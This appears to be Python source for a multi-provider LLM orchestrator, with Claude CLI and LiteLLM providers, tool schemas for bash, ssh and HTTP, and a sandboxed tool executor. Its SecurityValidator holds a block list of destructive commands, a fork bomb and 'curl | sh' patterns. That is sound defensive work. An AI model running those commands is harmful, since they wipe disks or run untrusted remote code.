    error: Optional[str] = None
    execution_time: float = 0.0


@dataclass
class UsageInfo:
    """Token usage information."""
    input_tokens: int = 0
    output_tokens: int = 0
    cache_read_tokens: int = 0
    cache_creation_tokens: int = 0
    
    @property
    def total_tokens(self) -> int:
        return self.input_tokens + self.output_tokens


@dataclass
class ProviderResponse:
    """Standardized response from any provider."""
    
    success: bool
    text: str
    provider: str
    model: str
    timestamp: str = field(default_factory=lambda: datetime.now().isoformat())
    error: Optional[str] = None
    usage: Optional[UsageInfo] = None
    tool_calls: List[ToolCall] = field(default_factory=list)
    tool_results: List[ToolResult] = field(default_factory=list)
    retries: int = 0
    raw_response: Optional[Any] = None
    session_id: Optional[str] = None
    
    @property
    def ok(self) -> bool:
        return self.success
    
    def to_dict(self) -> dict:
        """Convert to dictionary."""
        return {
            "success": self.success,
            "text": self.text,
            "provider": self.provider,
            "model": self.model,
            "timestamp": self.timestamp,
            "error": self.error,
            "usage": {
                "input_tokens": self.usage.input_tokens,
                "output_tokens": self.usage.output_tokens,
                "total_tokens": self.usage.total_tokens,
            } if self.usage else None,
            "retries": self.retries,
            "session_id": self.session_id,
        }


class BaseProvider(ABC):
    """
    Abstract base class for all LLM providers.
    
    Provides:
    - Rate limiting
    - Circuit breaker for fault tolerance
    - Retry with exponential backoff
    - Consistent response format
    
    Subclasses must implement:
    - name (property)
    - available_models (property)
    - _execute (method)
    """
    
    # Model aliases - override in subclasses
    MODEL_ALIASES: dict[str, str] = {}
    
    def __init__(
        self,
        model: str,
        timeout: float = 300.0,
        max_retries: int = 3,
        retry_delay: float = 1.0,
        rate_limit_per_minute: int = 60,
        enable_circuit_breaker: bool = True,
        circuit_breaker_threshold: int = 5,
        circuit_breaker_timeout: float = 30.0,
        **kwargs
    ):
        self.model = model
        self.timeout = timeout
        self.config = kwargs
        
        # Retry config
        self.retry_config = RetryConfig(
            max_retries=max_retries,
            base_delay=retry_delay,
            max_delay=60.0,
        )
        
        # Rate limiter
        self.rate_limiter = RateLimiter(
            max_calls=rate_limit_per_minute,
            period=60.0,
        )
        
        # Circuit breaker
        self.enable_circuit_breaker = enable_circuit_breaker
        self.circuit_breaker = CircuitBreaker(
            failure_threshold=circuit_breaker_threshold,
            timeout=circuit_breaker_timeout,
        ) if enable_circuit_breaker else None
    
    @property
    @abstractmethod
    def name(self) -> str:
        """Provider name (e.g., 'claude', 'litellm')."""
        pass
    
    @property
    @abstractmethod
    def available_models(self) -> list[str]:
        """List of available model names/aliases."""
        pass
    
    @property
    def supports_native_tools(self) -> bool:
        """Whether provider supports native function calling."""
        return False
    
    @property
    def supports_streaming(self) -> bool:
        """Whether provider supports streaming responses."""
        return False
    
    def resolve_model(self, model: str) -> str:
        """Resolve model alias to full model name."""
        return self.MODEL_ALIASES.get(model, model)
    
    @abstractmethod
    async def _execute(
        self,
        prompt: str,
        system_prompt: Optional[str] = None,
        tools: Optional[list[str]] = None,
        **kwargs
    ) -> ProviderResponse:
        """
        Internal execution method - implement in subclasses.
        
        This is the raw execution without retry/circuit breaker.
        """
        pass
    
    async def run(
        self,
        prompt: str,
        system_prompt: Optional[str] = None,
        **kwargs
    ) -> ProviderResponse:
        """
        Execute a prompt without tools.
        
        Includes rate limiting, retry, and circuit breaker.
        """
        return await self.run_with_tools(
            prompt=prompt,
            tools=[],
            system_prompt=system_prompt,
            **kwargs
        )
    
    async def run_with_tools(
        self,
        prompt: str,
        tools: list[str],
        system_prompt: Optional[str] = None,
        **kwargs
    ) -> ProviderResponse:
        """
        Execute a prompt with tools.
        
        Includes rate limiting, retry, and circuit breaker.
        """
        # Rate limiting
        await self.rate_limiter.acquire()
        
        # Define the execution function
        async def do_execute() -> ProviderResponse:
            return await self._execute(
                prompt=prompt,
                system_prompt=system_prompt,
                tools=tools,
                **kwargs
            )
        
        try:
            # With circuit breaker
            if self.circuit_breaker:
                async with self.circuit_breaker:
                    response, retries = await retry_with_backoff(
                        do_execute,
                        config=self.retry_config,
                    )
            else:
                response, retries = await retry_with_backoff(
                    do_execute,
                    config=self.retry_config,
                )
            
            response.retries = retries
            return response
            
        except Exception as e:
            return ProviderResponse(
                success=False,
                text="",
                provider=self.name,
                model=self.model,
                error=str(e),
            )
    
    async def health_check(self) -> bool:
        """Check if provider is healthy."""
        try:
            response = await self.run("Respond with only: OK")
            return response.success and "OK" in response.text.upper()
        except Exception:
            return False
    
    def __repr__(self) -> str:
        return f"{self.__class__.__name__}(model={self.model})"

orchestrator/providers/claude_provider.py

"""
Claude provider using Claude Code CLI.

This provider executes Claude via the CLI, handling:
- Proper JSON parsing
- Session management
- Tool execution
- Error handling
"""

import asyncio
import json
import shutil
import os
from typing import Optional, List, Any
from pathlib import Path

from .base import BaseProvider, ProviderResponse, UsageInfo, ToolCall


class ClaudeProviderError(Exception):
    """Base exception for Claude provider."""
    pass


class CLINotFoundError(ClaudeProviderError):
    """Claude CLI not found."""
    pass


class ExecutionError(ClaudeProviderError):
    """Error during execution."""
    pass


class ClaudeProvider(BaseProvider):
    """
    Provider that uses Claude Code CLI.
    
    Requires:
    - Claude Code CLI installed (`claude` command available)
    - Valid authentication (Pro/Max subscription or API key)
    
    Features:
    - Native tool support (Bash, Read, Write, etc.)
    - Session management
    - JSON output parsing
    - Autocompact for long conversations
    """
    
    MODEL_ALIASES = {
        # Friendly names
        "haiku": "claude-3-5-haiku-latest",
        "sonnet": "claude-sonnet-4-20250514",
        "opus": "claude-opus-4-20250514",
        # Semantic names
        "fast": "claude-3-5-haiku-latest",
        "default": "claude-sonnet-4-20250514",
        "smart": "claude-sonnet-4-20250514",
        "powerful": "claude-opus-4-20250514",
    }
    
    # Tools supported by Claude CLI
    NATIVE_TOOLS = [
        "Bash", "Read", "Write", "Edit",
        "Glob", "Grep", "WebFetch",
        "TodoRead", "TodoWrite",
    ]
    
    # Mapping from our tool names to Claude CLI tool names
    TOOL_NAME_MAP = {
        "bash": "Bash",
        "read": "Read", 
        "write": "Write",
        "edit": "Edit",
        "glob": "Glob",
        "grep": "Grep",
        "web_fetch": "WebFetch",
        "webfetch": "WebFetch",
    }
    
    def __init__(
        self,
        model: str = "sonnet",
        timeout: float = 300.0,
        cli_path: str = "claude",
        working_directory: Optional[str] = None,
        max_turns: int = 10,
        autocompact: bool = True,
        **kwargs
    ):
        """
        Args:
            model: Model to use (sonnet, opus, haiku, or full name)
            timeout: Execution timeout in seconds
            cli_path: Path to claude CLI
            working_directory: Working directory for execution
            max_turns: Maximum tool use turns
            autocompact: Enable automatic context compaction
        """
        super().__init__(model=model, timeout=timeout, **kwargs)
        
        self.cli_path = cli_path
        self.working_directory = working_directory or os.getcwd()
        self.max_turns = max_turns
        self.autocompact = autocompact
        
        # Verify CLI exists
        if not shutil.which(self.cli_path):
            raise CLINotFoundError(
                f"Claude CLI not found at '{self.cli_path}'. "
                "Install with: npm install -g @anthropic-ai/claude-code"
            )
    
    @property
    def name(self) -> str:
        return "claude"
    
    @property
    def available_models(self) -> list[str]:
        return list(self.MODEL_ALIASES.keys())
    
    @property
    def supports_native_tools(self) -> bool:
        return True
    
    def _map_tools(self, tools: List[str]) -> List[str]:
        """Map our tool names to Claude CLI tool names."""
        mapped = []
        for tool in tools:
            tool_lower = tool.lower()
            if tool_lower in self.TOOL_NAME_MAP:
                mapped.append(self.TOOL_NAME_MAP[tool_lower])
            elif tool in self.NATIVE_TOOLS:
                mapped.append(tool)
            # Skip non-native tools (http_request, ssh, etc.)
        return mapped
    
    def _build_command(
        self,
        prompt: str,
        system_prompt: Optional[str] = None,
        tools: Optional[List[str]] = None,
        session_id: Optional[str] = None,
        continue_session: bool = False,
    ) -> List[str]:
        """Build the CLI command."""
        cmd = [self.cli_path]
        
        # Prompt
        cmd.extend(["-p", prompt])
        
        # Output format
        cmd.extend(["--output-format", "json"])
        
        # Model
        resolved_model = self.resolve_model(self.model)
        cmd.extend(["--model", resolved_model])
        
        # System prompt
        if system_prompt:
            cmd.extend(["--system-prompt", system_prompt])
        
        # Tools
        if tools:
            native_tools = self._map_tools(tools)
            if native_tools:
                cmd.extend(["--allowedTools", ",".join(native_tools)])
        
        # Max turns
        cmd.extend(["--max-turns", str(self.max_turns)])
        
        # Session management
        if session_id:
            if continue_session:
                cmd.extend(["--continue", session_id])
            else:
                cmd.extend(["--session-id", session_id])
        
        return cmd
    
    def _parse_response(self, stdout: str, stderr: str, return_code: int) -> dict:
        """Parse the CLI response."""
        # Try to parse JSON
        try:
            # Handle potential multiple JSON objects (streaming artifacts)
            lines = stdout.strip().split('\n')
            
            # Find the last valid JSON object
            for line in reversed(lines):
                line = line.strip()
                if line.startswith('{'):
                    try:
                        return json.loads(line)
                    except json.JSONDecodeError:
                        continue
            
            # Try parsing the whole output
            return json.loads(stdout)
            
        except json.JSONDecodeError:
            # If JSON parsing fails, return raw output
            return {
                "result": stdout,
                "is_error": return_code != 0,
                "error": stderr if stderr else None,
            }
    
    def _extract_usage(self, response: dict) -> Optional[UsageInfo]:
        """Extract usage information from response."""
        usage_data = response.get("usage")
        if not usage_data:
            return None
        
        return UsageInfo(
            input_tokens=usage_data.get("input_tokens", 0),
            output_tokens=usage_data.get("output_tokens", 0),
            cache_read_tokens=usage_data.get("cache_read_input_tokens", 0),
            cache_creation_tokens=usage_data.get("cache_creation_input_tokens", 0),
        )
    
    async def _execute(
        self,
        prompt: str,
        system_prompt: Optional[str] = None,
        tools: Optional[List[str]] = None,
        session_id: Optional[str] = None,
        continue_session: bool = False,
        **kwargs
    ) -> ProviderResponse:
        """Execute the Claude CLI."""
        cmd = self._build_command(
            prompt=prompt,
            system_prompt=system_prompt,
            tools=tools or [],
            session_id=session_id,
            continue_session=continue_session,
        )
        
        try:
            process = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
                cwd=self.working_directory,
            )
            
            stdout, stderr = await asyncio.wait_for(
                process.communicate(),
                timeout=self.timeout
            )
            
            stdout_str = stdout.decode("utf-8", errors="replace")
            stderr_str = stderr.decode("utf-8", errors="replace")
            
            # Parse response
            response_data = self._parse_response(
                stdout_str, stderr_str, process.returncode
            )
            
            # Check for errors
            is_error = response_data.get("is_error", False) or process.returncode != 0
            
            # Extract text
            text = response_data.get("result", "")
            if not text and "content" in response_data:
                # Handle different response formats
                content = response_data["content"]
                if isinstance(content, list):
                    text = "\n".join(
                        c.get("text", "") for c in content 
                        if c.get("type") == "text"
                    )
                elif isinstance(content, str):
                    text = content
            
            # Extract error
            error = None
            if is_error:
                error = response_data.get("error") or stderr_str or "Unknown error"
            
            return ProviderResponse(
                success=not is_error,
                text=text,
                provider=self.name,
                model=self.model,
                error=error,
                usage=self._extract_usage(response_data),
                session_id=response_data.get("session_id"),
                raw_response=response_data,
            )
            
        except asyncio.TimeoutError:
            raise ExecutionError(f"Timeout after {self.timeout}s")
        except FileNotFoundError:
            raise CLINotFoundError(f"Claude CLI not found: {self.cli_path}")
        except Exception as e:
            raise ExecutionError(f"Execution failed: {e}")
    
    async def run_with_session(
        self,
        prompt: str,
        session_id: str,
        continue_session: bool = True,
        **kwargs
    ) -> ProviderResponse:
        """Run with explicit session management."""
        return await self.run_with_tools(
            prompt=prompt,
            tools=kwargs.pop("tools", []),
            system_prompt=kwargs.pop("system_prompt", None),
            session_id=session_id,
            continue_session=continue_session,
            **kwargs
        )
    
    async def health_check(self) -> bool:
        """Verify Claude CLI is working."""
        try:
            # Simple test command
            cmd = [self.cli_path, "-p", "Say OK", "--output-format", "json", "--max-turns", "1"]
            
            process = await asyncio.create_subprocess_exec(
                *cmd,
                stdout=asyncio.subprocess.PIPE,
                stderr=asyncio.subprocess.PIPE,
            )
            
            stdout, _ = await asyncio.wait_for(
                process.communicate(),
                timeout=30.0
            )
            
            if process.returncode == 0:
                return True
            
            return False
            
        except Exception:
            return False

orchestrator/providers/litellm_provider.py

"""
Universal LLM provider using LiteLLM.

Supports 100+ models through a unified interface:
- OpenAI (GPT-4, o1)
- Google (Gemini)
- Anthropic (via API)
- Mistral
- Ollama (local)
- Groq
- Together
- And many more...
"""

import asyncio
import json
import re
from typing import Optional, List, Any

from .base import BaseProvider, ProviderResponse, UsageInfo, ToolCall, ToolResult


class LiteLLMProvider(BaseProvider):
    """
    Universal provider using LiteLLM.
    
    Requires:
    - pip install litellm
    - Appropriate API keys in environment
    
    Features:
    - 100+ model support
    - Unified API
    - Tool execution loop
    - Cost tracking
    """
    
    MODEL_ALIASES = {
        # OpenAI
        "gpt4": "gpt-4",
        "gpt4o": "gpt-4o",
        "gpt4-turbo": "gpt-4-turbo",
        "gpt4o-mini": "gpt-4o-mini",
        "o1": "o1-preview",
        "o1-mini": "o1-mini",
        "o3-mini": "o3-mini",
        
        # Google Gemini
        "gemini": "gemini/gemini-1.5-pro",
        "gemini-pro": "gemini/gemini-1.5-pro",
        "gemini-flash": "gemini/gemini-1.5-flash",
        "gemini-2": "gemini/gemini-2.0-flash",
        
        # Anthropic (via API, not CLI)
        "claude-api": "claude-3-5-sonnet-20241022",
        "claude-opus-api": "claude-3-opus-20240229",
        
        # Mistral
        "mistral": "mistral/mistral-large-latest",
        "mistral-small": "mistral/mistral-small-latest",
        "mixtral": "mistral/open-mixtral-8x22b",
        "codestral": "mistral/codestral-latest",
        
        # Ollama (local)
        "llama3": "ollama/llama3",
        "llama3.1": "ollama/llama3.1",
        "llama3.2": "ollama/llama3.2",
        "codellama": "ollama/codellama",
        "mixtral-local": "ollama/mixtral",
        "qwen": "ollama/qwen2.5",
        "deepseek": "ollama/deepseek-r1",
        
        # Groq (fast inference)
        "groq-llama": "groq/llama-3.3-70b-versatile",
        "groq-mixtral": "groq/mixtral-8x7b-32768",
        
        # Together
        "together-llama": "together_ai/meta-llama/Llama-3-70b-chat-hf",
        
        # DeepSeek
        "deepseek-chat": "deepseek/deepseek-chat",
        "deepseek-coder": "deepseek/deepseek-coder",
    }
    
    # Models that support native function calling
    FUNCTION_CALLING_MODELS = {
        "gpt-4", "gpt-4o", "gpt-4-turbo", "gpt-4o-mini",
        "claude-3", "gemini",
    }
    
    def __init__(
        self,
        model: str = "gpt-4o",
        timeout: float = 300.0,
        api_key: Optional[str] = None,
        api_base: Optional[str] = None,
        max_tool_iterations: int = 10,
        temperature: float = 0.7,
        **kwargs
    ):
        """
        Args:
            model: Model name or alias
            timeout: Request timeout
            api_key: Override API key
            api_base: Override API base URL
            max_tool_iterations: Max tool use loops
            temperature: Sampling temperature
        """
        super().__init__(model=model, timeout=timeout, **kwargs)
        
        self.api_key = api_key
        self.api_base = api_base
        self.max_tool_iterations = max_tool_iterations
        self.temperature = temperature
        
        self._litellm = None
    
    def _get_litellm(self):
        """Lazy load litellm."""
        if self._litellm is None:
            try:
                import litellm
                litellm.set_verbose = False
                self._litellm = litellm
            except ImportError:
                raise ImportError(
                    "LiteLLM not installed. Run: pip install litellm"
                )
        return self._litellm
    
    @property
    def name(self) -> str:
        return "litellm"
    
    @property
    def available_models(self) -> list[str]:
        return list(self.MODEL_ALIASES.keys())
    
    @property
    def supports_native_tools(self) -> bool:
        """Check if current model supports function calling."""
        resolved = self.resolve_model(self.model)
        return any(fc in resolved for fc in self.FUNCTION_CALLING_MODELS)
    
    def _build_tools_prompt(self, tools: List[str]) -> str:
        """Build a prompt section describing available tools."""
        if not tools:
            return ""
        
        prompt = """
## Available Tools

You can use tools by responding with a JSON block like this:

```tool
{
    "tool": "tool_name",
    "params": {
        "param1": "value1"
    }
}

Available tools:

"""

    tool_descriptions = {
        "bash": "Execute a bash command. Params: command (required), working_dir (optional)",
        "read": "Read a file. Params: path (required), encoding (optional)",
        "write": "Write to a file. Params: path (required), content (required), append (optional bool)",
        "glob": "Find files by pattern. Params: pattern (required), base_dir (optional)",
        "grep": "Search text in files. Params: pattern (required), path (required), recursive (optional bool)",
        "http_request": "Make HTTP request. Params: url (required), method (optional), headers (optional), body (optional)",
        "ssh": "Execute remote command. Params: host (required), command (required), user (optional), key_path (optional)",
        "list_dir": "List directory contents. Params: path (required), recursive (optional bool)",
    }
    
    for tool in tools:
        if tool in tool_descriptions:
            prompt += f"- **{tool}**: {tool_descriptions[tool]}\n"
    
    prompt += "\nAfter using a tool, you'll receive the result and can continue.\n"
    
    return prompt

def _parse_tool_calls(self, text: str) -> List[ToolCall]:
    """Parse tool calls from response text."""
    calls = []
    
    # Pattern: ```tool { ... } ```
    pattern1 = r'```tool\s*\n?(.*?)\n?```'
    for match in re.findall(pattern1, text, re.DOTALL):
        try:
            data = json.loads(match.strip())
            if "tool" in data:
                calls.append(ToolCall(
                    tool=data["tool"],
                    params=data.get("params", {}),
                ))
        except json.JSONDecodeError:
            continue
    
    # Pattern: ```json { "tool": ... } ```
    pattern2 = r'```json\s*\n?(.*?)\n?```'
    for match in re.findall(pattern2, text, re.DOTALL):
        try:
            data = json.loads(match.strip())
            if "tool" in data:
                calls.append(ToolCall(
                    tool=data["tool"],
                    params=data.get("params", {}),
                ))
        except json.JSONDecodeError:
            continue
    
    return calls

async def _call_llm(
    self,
    messages: List[dict],
    max_tokens: Optional[int] = None,
) -> dict:
    """Make a single LLM call."""
    litellm = self._get_litellm()
    
    resolved_model = self.resolve_model(self.model)
    
    kwargs = {
        "model": resolved_model,
        "messages": messages,
        "temperature": self.temperature,
        "timeout": self.timeout,
    }
    
    if max_tokens:
        kwargs["max_tokens"] = max_tokens
    
    if self.api_key:
        kwargs["api_key"] = self.api_key
    
    if self.api_base:
        kwargs["api_base"] = self.api_base
    
    return await litellm.acompletion(**kwargs)

async def _execute(
    self,
    prompt: str,
    system_prompt: Optional[str] = None,
    tools: Optional[List[str]] = None,
    tool_executor: Optional[Any] = None,
    max_tokens: Optional[int] = None,
    **kwargs
) -> ProviderResponse:
    """Execute with optional tool loop."""
    tools = tools or []
    resolved_model = self.resolve_model(self.model)
    
    # Build system prompt with tools
    full_system = system_prompt or ""
    if tools:
        tools_prompt = self._build_tools_prompt(tools)
        full_system = f"{full_system}\n\n{tools_prompt}" if full_system else tools_prompt
    
    # Build messages
    messages = []
    if full_system:
        messages.append({"role": "system", "content": full_system})
    messages.append({"role": "user", "content": prompt})
    
    all_tool_results: List[ToolResult] = []
    total_usage = UsageInfo()
    text = ""
    
    # Tool execution loop
    for iteration in range(self.max_tool_iterations):
        try:
            response = await self._call_llm(messages, max_tokens)
        except Exception as e:
            return ProviderResponse(
                success=False,
                text="",
                provider=self.name,
                model=resolved_model,
                error=f"LiteLLM error: {e}",
            )
        
        # Extract text
        text = response.choices[0].message.content or ""
        
        # Update usage
        if hasattr(response, 'usage') and response.usage:
            total_usage.input_tokens += getattr(response.usage, 'prompt_tokens', 0)
            total_usage.output_tokens += getattr(response.usage, 'completion_tokens', 0)
        
        # Check for tool calls
        if tools and tool_executor:
            tool_calls = self._parse_tool_calls(text)
            
            if tool_calls:
                # Execute tools
                results_text_parts = []
                
                for call in tool_calls:
                    result = await tool_executor.execute(call.tool, call.params)
                    all_tool_results.append(ToolResult(
                        tool=call.tool,
                        success=result.success,
                        output=result.output,
                        error=result.error,
                        execution_time=result.execution_time,
                    ))
                    
                    status = "✅" if result.success else "❌"
                    output = result.output if result.success else result.error
                    results_text_parts.append(
                        f"**{call.tool}** {status}\n{output}"
                    )
                
                # Add to conversation and continue
                results_text = "\n\n".join(results_text_parts)
                messages.append({"role": "assistant", "content": text})
                messages.append({"role": "user", "content": f"Tool results:\n\n{results_text}\n\nContinue."})
                continue
        
        # No tool calls, we're done
        break
    
    return ProviderResponse(
        success=True,
        text=text,
        provider=self.name,
        model=resolved_model,
        usage=total_usage if total_usage.total_tokens > 0 else None,
        tool_results=[
            ToolResult(
                tool=r.tool,
                success=r.success,
                output=r.output,
                error=r.error,
            )
            for r in all_tool_results
        ],
    )

---

## orchestrator/tools/\_\_init\_\_.py

```python
"""
Tool definitions and executor.
"""

from .definitions import TOOL_DEFINITIONS, get_tool_schema, get_tools_prompt
from .executor import ToolExecutor, ToolResult, SecurityValidator

__all__ = [
    "TOOL_DEFINITIONS",
    "get_tool_schema", 
    "get_tools_prompt",
    "ToolExecutor",
    "ToolResult",
    "SecurityValidator",
]

orchestrator/tools/definitions.py

"""
Tool definitions in standard format.

Compatible with OpenAI function calling and other providers.
"""

from typing import Any, List, Dict


TOOL_DEFINITIONS: Dict[str, dict] = {
    "bash": {
        "name": "bash",
        "description": "Execute a bash command on the system. Use for running scripts, system commands, git, etc.",
        "parameters": {
            "type": "object",
            "properties": {
                "command": {
                    "type": "string",
                    "description": "The bash command to execute"
                },
                "working_dir": {
                    "type": "string",
                    "description": "Optional working directory"
                }
            },
            "required": ["command"]
        }
    },
    
    "read": {
        "name": "read",
        "description": "Read the contents of a file. Returns the text content.",
        "parameters": {
            "type": "object",
            "properties": {
                "path": {
                    "type": "string",
                    "description": "Path to the file to read"
                },
                "encoding": {
                    "type": "string",
                    "description": "File encoding (default: utf-8)"
                }
            },
            "required": ["path"]
        }
    },
    
    "write": {
        "name": "write",
        "description": "Write content to a file. Creates the file if it doesn't exist, overwrites if it does.",
        "parameters": {
            "type": "object",
            "properties": {
                "path": {
                    "type": "string",
                    "description": "Path to the file to write"
                },
                "content": {
                    "type": "string",
                    "description": "Content to write to the file"
                },
                "append": {
                    "type": "boolean",
                    "description": "If true, append instead of overwrite"
                }
            },
            "required": ["path", "content"]
        }
    },
    
    "glob": {
        "name": "glob",
        "description": "Find files using glob patterns. E.g., '**/*.py' finds all Python files.",
        "parameters": {
            "type": "object",
            "properties": {
                "pattern": {
                    "type": "string",
                    "description": "Glob pattern to search for files"
                },
                "base_dir": {
                    "type": "string",
                    "description": "Base directory for the search"
                }
            },
            "required": ["pattern"]
        }
    },
    
    "grep": {
        "name": "grep",
        "description": "Search for text in files using regular expressions.",
        "parameters": {
            "type": "object",
            "properties": {
                "pattern": {
                    "type": "string",
                    "description": "Regex pattern to search for"
                },
                "path": {
                    "type": "string",
                    "description": "File or directory to search in"
                },
                "recursive": {
                    "type": "boolean",
                    "description": "Search recursively in subdirectories"
                }
            },
            "required": ["pattern", "path"]
        }
    },
    
    "http_request": {
        "name": "http_request",
        "description": "Make an HTTP request. Useful for REST APIs.",
        "parameters": {
            "type": "object",
            "properties": {
                "url": {
                    "type": "string",
                    "description": "URL to request"
                },
                "method": {
                    "type": "string",
                    "enum": ["GET", "POST", "PUT", "DELETE", "PATCH"],
                    "description": "HTTP method"
                },
                "headers": {
                    "type": "object",
                    "description": "Request headers"
                },
                "body": {
                    "type": "string",
                    "description": "Request body (for POST, PUT, PATCH)"
                },
                "timeout": {
                    "type": "number",
                    "description": "Request timeout in seconds"
                }
            },
            "required": ["url"]
        }
    },
    
    "ssh": {
        "name": "ssh",
        "description": "Execute a command on a remote server via SSH.",
        "parameters": {
            "type": "object",
            "properties": {
                "host": {
                    "type": "string",
                    "description": "Server host or IP"
                },
                "command": {
                    "type": "string",
                    "description": "Command to execute on the server"
                },
                "user": {
                    "type": "string",
                    "description": "SSH user (default: root)"
                },
                "key_path": {
                    "type": "string",
                    "description": "Path to SSH key"
                },
                "port": {
                    "type": "integer",
                    "description": "SSH port (default: 22)"
                }
            },
            "required": ["host", "command"]
        }
    },
    
    "list_dir": {
        "name": "list_dir",
        "description": "List the contents of a directory.",
        "parameters": {
            "type": "object",
            "properties": {
                "path": {
                    "type": "string",
                    "description": "Path to the directory"
                },
                "recursive": {
                    "type": "boolean",
                    "description": "List recursively"
                },
                "include_hidden": {
                    "type": "boolean",
                    "description": "Include hidden files"
                }
            },
            "required": ["path"]
        }
    },
}


def get_tool_schema(tool_names: List[str], format: str = "openai") -> List[dict]:
    """
    Get tool schemas in the specified format.
    
    Args:
        tool_names: List of tool names
        format: Output format (openai, anthropic, gemini)
        
    Returns:
        List of tool definitions
    """
    tools = []
    
    for name in tool_names:
        if name not in TOOL_DEFINITIONS:
            continue
            
        tool_def = TOOL_DEFINITIONS[name]
        
        if format == "openai":
            tools.append({
                "type": "function",
                "function": {
                    "name": tool_def["name"],
                    "description": tool_def["description"],
                    "parameters": tool_def["parameters"]
                }
            })
        elif format == "anthropic":
            tools.append({
                "name": tool_def["name"],
                "description": tool_def["description"],
                "input_schema": tool_def["parameters"]
            })
        elif format == "gemini":
            tools.append({
                "function_declarations": [{
                    "name": tool_def["name"],
                    "description": tool_def["description"],
                    "parameters": tool_def["parameters"]
                }]
            })
        else:
            tools.append(tool_def)
    
    return tools


def get_tools_prompt(tool_names: List[str]) -> str:
    """
    Generate a prompt describing available tools.
    
    For models that don't support native function calling.
    """
    if not tool_names:
        return ""
    
    prompt = """## Available Tools

You can use the following tools. To use them, respond with a JSON block like this:

```tool
{
    "tool": "tool_name",
    "params": {
        "param1": "value1"
    }
}

Tools:

"""

for name in tool_names:
    if name not in TOOL_DEFINITIONS:
        continue
    
    tool = TOOL_DEFINITIONS[name]
    props = tool["parameters"]["properties"]
    required = tool["parameters"].get("required", [])
    
    prompt += f"### {tool['name']}\n"
    prompt += f"{tool['description']}\n"
    prompt += "Parameters:\n"
    
    for prop_name, prop_def in props.items():
        req_marker = "(required)" if prop_name in required else "(optional)"
        prompt += f"  - {prop_name} {req_marker}: {prop_def.get('description', '')}\n"
    
    prompt += "\n"

prompt += """

After using a tool, you'll receive the result and can continue. You can use multiple tools in sequence for complex tasks. """

return prompt

---

## orchestrator/tools/executor.py

```python
"""
Secure tool executor.

Features:
- Path sandboxing
- Command validation
- Rate limiting
- Retry with backoff
- Security logging
"""

import asyncio
import json
import re
import shlex
import time
import urllib.request
import urllib.error
from pathlib import Path
from dataclasses import dataclass, field
from typing import Optional, Callable, Dict, Any, List
from datetime import datetime

from ..core import RateLimiter, retry_with_backoff, RetryConfig


@dataclass
class ToolResult:
    """Result of tool execution."""
    tool: str
    success: bool
    output: str
    error: Optional[str] = None
    execution_time: float = 0.0
    timestamp: str = field(default_factory=lambda: datetime.now().isoformat())
    retries: int = 0


class SecurityValidator:
    """Security validator for tool operations."""
    
    # Commands that should never be executed
    DANGEROUS_COMMANDS = {
        "rm -rf /", "rm -rf /*", ":(){ :|:& };:",
        "dd if=", "mkfs", "fdisk", "> /dev/sd",
        "chmod -R 777 /", "chown -R", "curl | sh",
        "wget | sh", "curl | bash", "wget | bash",
    }
    
    # Dangerous patterns
    DANGEROUS_PATTERNS = [
        r"rm\s+-rf\s+/(?!\w)",      # rm -rf / (but not /home)
        r">\s*/dev/sd[a-z]",         # Write to devices
        r"mkfs\.",                   # Format disks
        r"dd\s+if=.+of=/dev",        # dd to devices
        r"\|\s*(?:ba)?sh",           # Piping to shell
        r";\s*rm\s+-rf",             # Command injection with rm
    ]
    
    def __init__(
        self,
        working_dir: Path,
        sandbox: bool = True,
        allowed_commands: Optional[List[str]] = None
    ):
        self.working_dir = working_dir.resolve()
        self.sandbox = sandbox
        self.allowed_commands = allowed_commands
    
    def validate_path(self, path: str) -> tuple[bool, str]:
        """
        Validate that a path is within the sandbox.
        
        Returns:
            (is_valid, resolved_path_or_error)
        """
        if not self.sandbox:
            return True, str(Path(path).expanduser())
        
        try:
            resolved = Path(path).expanduser()
            if not resolved.is_absolute():
                resolved = self.working_dir / resolved
            resolved = resolved.resolve()
            
            # Check if within working_dir
            try:
                resolved.relative_to(self.working_dir)
                return True, str(resolved)
            except ValueError:
                return False, f"Path outside sandbox: {path}"
        except Exception as e:
            return False, f"Invalid path: {e}"
    
    def validate_command(self, command: str) -> tuple[bool, str]:
        """
        Validate that a command is safe.
        
        Returns:
            (is_safe, error_if_unsafe)
        """
        # Check exact dangerous commands
        for dangerous in self.DANGEROUS_COMMANDS:
            if dangerous in command:
                return False, f"Dangerous command: {dangerous}"
        
        # Check dangerous patterns
        for pattern in self.DANGEROUS_PATTERNS:
            if re.search(pattern, command, re.IGNORECASE):
                return False, f"Dangerous pattern: {pattern}"
        
        # Check whitelist if provided
        if self.allowed_commands:
            cmd_name = command.split()[0] if command.split() else ""
            if cmd_name not in self.allowed_commands:
                return False, f"Command not allowed: {cmd_name}"
        
        return True, ""
    
    def sanitize_for_shell(self, value: str) -> str:
        """Escape a value for safe shell use."""
        return shlex.quote(value)


class ToolExecutor:
    """
    Executes tools securely.
    
    Features:
    - Path sandboxing
    - Command validation
    - Rate limiting
    - Automatic retry
    """
    
    def __init__(
        self,
        working_dir: Optional[str] = None,
        timeout: float = 60.0,
        sandbox_paths: bool = True,
        allowed_commands: Optional[List[str]] = None,
        ssh_key_path: str = "~/.ssh/id_rsa",
        ssh_strict_host_checking: bool = True,
        rate_limit_per_minute: int = 60,
        max_retries: int = 3,
        retry_delay: float = 1.0,
    ):
        self.working_dir = Path(working_dir).resolve() if working_dir else Path.cwd()
        self.timeout = timeout
        self.ssh_key_path = Path(ssh_key_path).expanduser()
        self.ssh_strict_host_checking = ssh_strict_host_checking
        self.max_retries = max_retries
        
        # Security
        self.validator = SecurityValidator(
            self.working_dir,
            sandbox=sandbox_paths,
            allowed_commands=allowed_commands,
        )
        
        # Rate limiting
        self.rate_limiter = RateLimiter(rate_limit_per_minute)
        
        # Retry config
        self.retry_config = RetryConfig(
            max_retries=max_retries,
            base_delay=retry_delay,
        )
        
        # Tool registry
        self._tools: Dict[str, Callable] = {
            "bash": self._exec_bash,
            "read": self._exec_read,
            "write": self._exec_write,
            "glob": self._exec_glob,
            "grep": self._exec_grep,
            "http_request": self._exec_http,
            "ssh": self._exec_ssh,
            "list_dir": self._exec_list_dir,
        }
    
    @property
    def available_tools(self) -> List[str]:
        """List of available tool names."""
        return list(self._tools.keys())
    
    async def execute(self, tool: str, params: dict) -> ToolResult:
        """
        Execute a tool with rate limiting and retry.
        """
        start_time = time.time()
        
        if tool not in self._tools:
            return ToolResult(
                tool=tool,
                success=False,
                output="",
                error=f"Unknown tool: {tool}",
            )
